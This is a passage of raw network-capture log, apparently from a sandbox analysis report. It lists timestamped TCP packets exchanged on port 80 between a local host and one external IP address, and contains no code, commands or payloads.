                                                                                                                                                                Feb 22, 2021 07:45:14.754012108 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754044056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754046917 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.754076004 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754108906 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754111052 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.754858017 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754903078 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754914999 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.754939079 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754971981 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.754981041 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.755004883 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.755037069 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.755047083 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.755800962 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.755835056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.755867004 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.755870104 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.755913973 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.756169081 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.756216049 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.756257057 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.756287098 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.756294966 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.756329060 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.756331921 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.756361961 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.756401062 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.757078886 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.757114887 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.757147074 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.757158995 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.757179976 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.757214069 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.757216930 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.757253885 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.757308006 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.758258104 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.758296967 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.758328915 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.758348942 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.758361101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.758408070 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.053987026 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054034948 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054071903 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054111004 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054138899 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.054152966 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054174900 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.054210901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054269075 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.054372072 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054409027 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054462910 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.054526091 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054577112 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054619074 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054629087 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.054656982 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054696083 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054704905 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.054733992 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.054790974 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.055447102 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.055489063 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.055531025 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.055565119 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.055569887 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.055607080 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.055620909 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.055644989 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.055701971 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.056341887 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.056446075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.056488037 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.056507111 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.056525946 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.056565046 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.056579113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.056603909 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.056659937 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.057291985 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.057763100 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.057802916 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.057838917 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.057840109 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.057878971 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.057892084 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.057918072 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.057956934 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.057970047 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.058243036 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.058293104 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.058303118 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.058336973 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.058374882 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.058382988 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.058413982 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.058461905 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.058486938 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059165001 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059191942 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059233904 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.059478045 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059516907 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059545040 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.059551954 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059602022 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.059672117 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059710979 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059745073 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.059763908 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.060075045 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.060117960 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.060158014 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.060164928 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.060197115 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.060210943 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.060235977 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.060276985 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.060295105 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.060877085 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.060947895 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.134008884 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.181540966 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.218117952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.218178034 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.218213081 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.218367100 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.522202969 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522236109 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522253036 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522269964 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522286892 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522304058 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522360086 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.522391081 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.522634029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522650003 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522663116 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522679090 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522691965 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522707939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.522711039 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.522722960 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.522752047 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.523510933 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.523528099 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.523623943 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.832583904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.832613945 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.832631111 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.832648039 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.832664013 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.832679987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:15.832715988 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.832756996 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:15.832763910 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.185997963 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186027050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186043978 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186063051 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186079979 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186091900 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186090946 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.186134100 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.186167955 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.186358929 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186378002 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186398983 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186418056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186434031 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.186434984 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186451912 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.186460972 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.186496973 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.187269926 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.187283039 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.187339067 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.189078093 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.189095974 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.189111948 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.189152956 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.252254009 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.502341032 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.502372026 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.502388000 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.502516985 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.510157108 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510189056 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510204077 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510234118 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.510256052 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.510272980 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510292053 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510308027 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510328054 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510339975 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.510345936 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510361910 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.510373116 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.510452032 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.511195898 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.511221886 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.511240959 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.511256933 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.511274099 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.511290073 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.511291981 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.511305094 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.511337042 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.512099028 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.513705969 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.513732910 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.513746023 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.513762951 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.513776064 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.513783932 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.513788939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.513802052 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.513851881 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.514128923 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.514151096 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.514164925 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.514184952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.514198065 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.514204025 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.514220953 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.514259100 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.521315098 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.521342993 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.521353006 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.521483898 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.821692944 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.821728945 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.821752071 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.821805000 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.821825981 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.821847916 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.821914911 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.821969986 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.822050095 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822069883 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822186947 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822212934 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822226048 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.822236061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822261095 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822276115 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.822288036 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822310925 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.822321892 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.823040009 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.827735901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.827771902 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.827795982 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.827819109 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.827841997 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.827855110 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.827862978 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.827881098 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.828088999 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.828114033 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.828135967 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.828138113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.828157902 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.828181028 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.828191042 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.828206062 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.828234911 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.828341961 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.829039097 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829068899 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829092979 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829114914 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829138041 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829160929 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829164028 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.829190016 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.829895973 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829924107 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829947948 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829961061 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.829968929 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.829993010 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.830003023 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.830017090 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.830022097 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.830770016 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.830780029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.830810070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.830827951 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.830868959 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.831047058 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.831072092 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.831094027 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:16.831105947 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:16.831115961 CET8049715104.21.71.230192.168.2.5
